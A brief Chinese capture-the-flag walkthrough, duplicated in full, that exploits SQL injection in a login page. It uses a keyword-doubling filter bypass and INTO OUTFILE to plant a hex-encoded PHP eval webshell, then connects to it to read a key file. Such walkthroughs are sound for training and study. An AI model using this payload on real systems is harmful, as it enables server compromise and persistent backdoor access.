输入admin/login.jsp进入登陆页面
判断存在sql注入漏洞
在用户名注入一句话木马,需要把php一句话木马转为十六进制1’ uni union on selselectect 0x3c3f706870406576616c28245f706f73745b315d293f3e
,2,3,4,5 in into outoutfilefile ‘/var/www/html/muma.php’
使用菜刀连接,在根目录发现key.txt,打开得到key
输入admin/login.jsp进入登陆页面
判断存在sql注入漏洞
在用户名注入一句话木马,需要把php一句话木马转为十六进制1’ uni union on selselectect 0x3c3f706870406576616c28245f706f73745b315d293f3e
,2,3,4,5 in into outoutfilefile ‘/var/www/html/muma.php’
使用菜刀连接,在根目录发现key.txt,打开得到key